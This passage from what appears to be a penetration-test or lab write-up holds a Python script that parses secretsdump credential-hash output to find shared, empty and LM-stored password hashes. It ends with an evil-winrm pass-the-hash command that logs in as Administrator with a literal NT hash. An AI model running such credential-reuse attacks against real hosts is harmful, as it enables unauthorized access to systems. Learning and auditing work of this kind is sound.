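    (status messages, Kerberos keys) is skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        account = parts[0].split("\\")[-1]      # drop the domain prefix
        entries.append({"account": account, "rid": int(parts[1]), "lm": lm, "nt": nt})
    return entries


def shared_nt_hashes(entries):
    """Accounts that share an NT hash share a password: {nt_hash: [accounts]}."""
    groups = defaultdict(list)
    for e in entries:
        groups[e["nt"]].append(e["account"])
    return {h: accts for h, accts in groups.items() if len(accts) > 1}


def empty_passwords(entries):
    """Accounts whose NT hash is the hash of the empty string."""
    return [e["account"] for e in entries if e["nt"] == EMPTY_NT]


def lm_hashes_present(entries):
    """Accounts that still have a real LM hash stored (LM storage not disabled)."""
    return [e["account"] for e in entries if e["lm"] != EMPTY_LM]


if __name__ == "__main__":
    entries = parse_secretsdump(SAMPLE_DUMP)
    print("shared:", shared_nt_hashes(entries))
    print("empty:", empty_passwords(entries))
    print("lm stored:", lm_hashes_present(entries))
```

The shared-hash check is the one that matters in a real engagement: every group it returns is a password reused across accounts, which is a finding in its own right and, as here, also tells you which of those accounts were touched during the test.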

Log in with the Administrator NT hash using -H (pass-the-hash):

```
evil-winrm -i 10.10.11.42 -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
```


Done for the day.